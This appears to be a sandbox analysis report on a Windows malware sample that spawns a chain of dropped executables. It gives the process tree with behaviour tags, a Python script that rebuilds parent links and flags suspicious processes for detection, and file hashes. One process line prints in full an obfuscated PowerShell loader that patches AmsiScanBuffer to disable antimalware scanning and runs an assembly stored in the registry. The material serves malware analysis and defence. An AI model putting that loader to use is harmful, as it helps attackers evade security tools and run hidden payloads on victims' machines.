C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4304
-
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AQEQSsXneEVd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zqPrIoOTgjIPwx,[Parameter(Position=1)][Type]$pcFHOpjewr)$umAguEtgBgl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+'e'+'l'+[Char](101)+'ga'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+'e'+'m'+[Char](111)+'ry'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+'a'+'te'+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+','+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+'s'+''+'i'+''+[Char](67)+'l'+'a'+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+[Char](116)+'oCla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$umAguEtgBgl.DefineConstructor(''+'R'+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+'l'+'N'+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$zqPrIoOTgjIPwx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+''+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+'e'+''+'d'+'');$umAguEtgBgl.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+'S'+'ig'+','+'N'+[Char](101)+'wS
l'+'o'+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$pcFHOpjewr,$zqPrIoOTgjIPwx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+'Man'+'a'+'ged');Write-Output $umAguEtgBgl.CreateType();}$uhJvvrezRzuZQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+'t.'+[Char](87)+'i'+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+'M'+'eth'+'o'+'ds');$fuacyMnXZyCvLd=$uhJvvrezRzuZQ.GetMethod(''+[Char](71)+'e'+[Char](116)+'Pr'+[Char](111)+'cA'+'d'+'d'+'r'+''+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jGSjWxrSbdJNDWHInaa=AQEQSsXneEVd @([String])([IntPtr]);$sUfVPzqStEVQDePjsPTKzV=AQEQSsXneEVd 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gjGdSBXvWOQ=$uhJvvrezRzuZQ.GetMethod('G'+'e'+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+'nel'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$FiDHRsfwfuHrfE=$fuacyMnXZyCvLd.Invoke($Null,@([Object]$gjGdSBXvWOQ,[Object](''+'L'+''+[Char](111)+''+'a'+''+'d'+''+[Char](76)+'i'+'b'+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+'A'+'')));$MHGVGDORDxlWFsHcz=$fuacyMnXZyCvLd.Invoke($Null,@([Object]$gjGdSBXvWOQ,[Object](''+[Char](86)+'i'+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+'o'+'t'+''+[Char](101)+'c'+'t'+'')));$fYfmJEK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FiDHRsfwfuHrfE,$jGSjWxrSbdJNDWHInaa).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i.'+[Char](100)+''+'l'+''+[Char](108)+'');$EHhzRrJOiEyzmxvjT=$fuacyMnXZyCvLd.Invoke($Null,@([Object]$fYfmJEK,[Object]('A'+'m'+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+'B'+'u'+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$ttmblTvobe=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MHGVGDORDxlWFsHcz,$sUfVPzqStEVQDePjsPTKzV).Invoke($EHhzRrJOiEyzmxvjT,[uint32]8,4,[ref]$ttmblTvobe);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EHhzRrJOiEyzmxvjT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MHGVGDORDxlWFsHcz,$sUfVPzqStEVQDePjsPTKzV).Invoke($EHhzRrJOiEyzmxvjT,[uint32]8,0x20,[ref]$ttmblTvobe);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+'7'+''+[Char](55)+'s'+[Char](116)+''+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3364
  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe (level 2)
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:484

  C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe (level 2)
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  PID:1288

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm (level 1) PID:1272
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc (level 1) PID:1320
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc (level 1) PID:1448

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog (level 1)
- Drops file in System32 directory
PID:1456

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager (level 1) PID:1516
  sihost.exe (image C:\Windows\system32\sihost.exe) (level 2) PID:2996

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem (level 1) PID:1572
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes (level 1) PID:1592
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS (level 1) PID:1716
C:\Windows\system32\svchost.exe -k NetworkService -p (level 1) PID:1732
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder (level 1) PID:1776
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p (level 1) PID:1828
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp (level 1) PID:1892
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p (level 1) PID:1528
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p (level 1) PID:1676
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository (level 1) PID:1984
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection (level 1) PID:2072
C:\Windows\System32\spoolsv.exe (level 1) PID:2140
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation (level 1) PID:2244
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc (level 1) PID:2352
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT (level 1) PID:2492
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent (level 1) PID:2500
C:\Windows\system32\svchost.exe -k NetworkService -p (level 1) PID:2532
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer (level 1) PID:2616
C:\Windows\sysmon.exe (level 1) PID:2636
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks (level 1) PID:2660
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt (level 1) PID:2708
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService (level 1) PID:2716
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc (level 1) PID:3044
C:\Windows\system32\wbem\unsecapp.exe -Embedding (level 1) PID:3196

C:\Windows\Explorer.EXE (level 1) PID:3380
  "C:\Users\Admin\AppData\Local\Temp\a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe" (level 2)
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:4972
    "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe" (level 3)
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of WriteProcessMemory
    PID:2272
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe" (level 4)
      - Executes dropped EXE
      PID:1968
      "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe" (level 4)
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID:4436
        "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe" (level 5)
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        PID:1936
          "C:\Users\Admin\AppData\Local\Temp\1000046001\Kaxhwswfup.exe" (level 6)
          - Drops startup file
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID:2820
            "C:\Users\Admin\AppData\Local\Temp\$7760c8f0" (level 7)
            - Executes dropped EXE
            PID:3368
            "C:\Users\Admin\AppData\Local\Temp\$772f9fd5" (level 7)
            - Executes dropped EXE
            PID:4412
      "C:\Users\Admin\1000006002\18571080f2.exe" (level 4)
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Checks whether UAC is enabled
      PID:2824

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc (level 1) PID:3544
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo (level 1) PID:3600
C:\Windows\System32\RuntimeBroker.exe -Embedding (level 1) PID:3928

C:\Windows\System32\RuntimeBroker.exe -Embedding (level 1)
- Suspicious use of UnmapMainImage
PID:4000

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} (level 1) PID:4020
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc (level 1) PID:4072
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F} (level 1) PID:4204
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc (level 1) PID:4440
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV (level 1) PID:3784
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc (level 1) PID:1108
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc (level 1) PID:2528

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc (level 1)
- Modifies data under HKEY_USERS
PID:3444

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service (level 1)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3024

C:\Windows\system32\SppExtComObj.exe -Embedding (level 1) PID:2196
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager (level 1) PID:2964
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} (level 1) PID:4100
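The infection chain in the tree above runs six levels deep under Explorer.EXE (sample → explorku.exe → amers.exe → axplons.exe → Kaxhwswfup.exe → two unnamed $-prefixed drops), and the report encodes parentage only through the level numbers. The Python below is an added example, not part of the sandbox report: it rebuilds parent/child links from those levels, prints each flagged process's lineage, and applies two rules drawn from what this report shows for the Amadey chain: an executable staged in a ten-character hex or decimal directory (the install_dir 908f070dff from the extracted config, and the 1000005001 / 1000046001 / 1000006002 download folders) and a persistence tag ("Adds Run key to start application", "Drops startup file"). TREE is transcribed from the malware branch of the tree above with the behaviour tags trimmed to the ones the rules use; the directory pattern and the flag rules are the example's own assumptions, not sandbox signatures.

```python
import ntpath
import re
from dataclasses import dataclass, field


@dataclass
class Proc:
    level: int           # depth shown in the report tree
    pid: int
    image: str           # image path as shown in the tree
    behaviors: tuple     # behaviour tags listed under the process
    parent: "Proc | None" = None
    children: list = field(default_factory=list)


# Transcribed from the malware branch of the process tree above (service hosts omitted,
# behaviour tags trimmed to those the rules below look at).
TREE = [
    (1, 3380, r"C:\Windows\Explorer.EXE", ()),
    (2, 4972, r"C:\Users\Admin\AppData\Local\Temp\a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe",
     ("Checks whether UAC is enabled", "Drops file in Windows directory", "Suspicious use of WriteProcessMemory")),
    (3, 2272, r"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe",
     ("Executes dropped EXE", "Adds Run key to start application", "Suspicious use of WriteProcessMemory")),
    (4, 1968, r"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe", ("Executes dropped EXE",)),
    (4, 4436, r"C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe",
     ("Executes dropped EXE", "Drops file in Windows directory", "Suspicious use of WriteProcessMemory")),
    (5, 1936, r"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe",
     ("Executes dropped EXE", "Suspicious use of WriteProcessMemory")),
    (6, 2820, r"C:\Users\Admin\AppData\Local\Temp\1000046001\Kaxhwswfup.exe",
     ("Drops startup file", "Executes dropped EXE", "Suspicious use of SetThreadContext")),
    (7, 3368, r"C:\Users\Admin\AppData\Local\Temp\$7760c8f0", ("Executes dropped EXE",)),
    (7, 4412, r"C:\Users\Admin\AppData\Local\Temp\$772f9fd5", ("Executes dropped EXE",)),
    (4, 2824, r"C:\Users\Admin\1000006002\18571080f2.exe", ("Executes dropped EXE", "Checks whether UAC is enabled")),
]

# Assumption of this example: an .exe whose parent directory is a ten-character hex/decimal name,
# directly under the profile or under %LOCALAPPDATA%\Temp, matches the Amadey install_dir and
# download-folder layout seen in this report.
STAGE_DIR = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\(?:AppData\\Local\\Temp\\)?[0-9a-f]{10}\\[^\\]+\.exe$", re.I)
PERSISTENCE_TAGS = {"Adds Run key to start application", "Drops startup file"}


def build_tree(rows):
    """Rebuild parent/child links from the level numbers: a row's parent is the nearest
    earlier row with a smaller level, so a stack of open ancestors is enough."""
    procs, stack = [], []
    for level, pid, image, tags in rows:
        p = Proc(level, pid, image, tuple(tags))
        while stack and stack[-1].level >= level:
            stack.pop()
        if stack:
            p.parent = stack[-1]
            stack[-1].children.append(p)
        stack.append(p)
        procs.append(p)
    return procs


def lineage(p):
    """Root-to-leaf chain as 'name(pid) > name(pid) > ...'."""
    chain = []
    while p is not None:
        chain.append(f"{ntpath.basename(p.image)}({p.pid})")
        p = p.parent
    return " > ".join(reversed(chain))


def flag_process(p):
    reasons = []
    if STAGE_DIR.match(p.image):
        reasons.append("runs from ten-character staging directory")
    for tag in p.behaviors:
        if tag in PERSISTENCE_TAGS:
            reasons.append("persistence: " + tag)
    return reasons


def flag_processes(procs):
    """Map PID -> reasons for every process that trips at least one rule."""
    findings = {}
    for p in procs:
        reasons = flag_process(p)
        if reasons:
            findings[p.pid] = reasons
    return findings


if __name__ == "__main__":
    procs = build_tree(TREE)
    by_pid = {p.pid: p for p in procs}
    for pid, reasons in flag_processes(procs).items():
        print(f"{pid}: {', '.join(reasons)}")
        print(f"    {lineage(by_pid[pid])}")
```

The stack-based rebuild is the part worth keeping: it turns any depth-annotated listing into real parent links, which is what you need before asking "what did the process with the Run key actually spawn". Here it places 18571080f2.exe (PID 2824) under explorku.exe (PID 2272) rather than under the deeper axplons.exe branch that precedes it in the listing, and attributes both $-prefixed drops to Kaxhwswfup.exe (PID 2820).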
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2.1MB
  MD5: 1c7a02bb53ab156eb200122c93dde12f
  SHA1: 4b52e8d87ce511b05aa619a782e14f7e6625f37c
  SHA256: c9b4047be7c4b7190533db32c67b85fe51c1692cca1d36944ad2f4d554b9320a
  SHA512: 72a7d5002a6972b3a7a5230cf68a54760ab282e43838cc27053dbf39eaf1bbfb370c83080a68544ae523ddeefa3e1a53fd46b9ac8715b1b74747933060061b8f
- Filesize: 1.9MB
  MD5: 6e14c3b7c3374ca36a6a193eecbe6ff3
  SHA1: 481b77201a9abe4ee619642aa34048b813d940eb
  SHA256: 433c09a91cf3b14922f0f1f7833cfc172c3752c38a9fee67a42dd8b4f3dc1a51
  SHA512: f3cdaaad74f2e855e0144a93eb0751c54dd7d2fc615f08f9c52c6b11f3fcb01bccee283eec92ac2776aba5793b8290fa94842e7480713985aad355ee29a44a99
- Filesize: 4.5MB
  MD5: 133fda00a490e613f3a6c511c1c660eb
  SHA1: e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9
  SHA256: cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169
  SHA512: f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd
- Filesize: 1.5MB (same hashes as the submitted sample)
  MD5: 32187c18a470b54095365f8db359a671
  SHA1: 3ce7f687006e176a5b1554e30decdfed60e35aae
  SHA256: a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948
  SHA512: a9873b6ac3f480ad881bee4fe52d960127696f816007ee1ed4a2511ff82f7cc10ec98ef16cdc2869b49b716d3453ee6a7d952a1988083d046ba05dd9d579449a
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82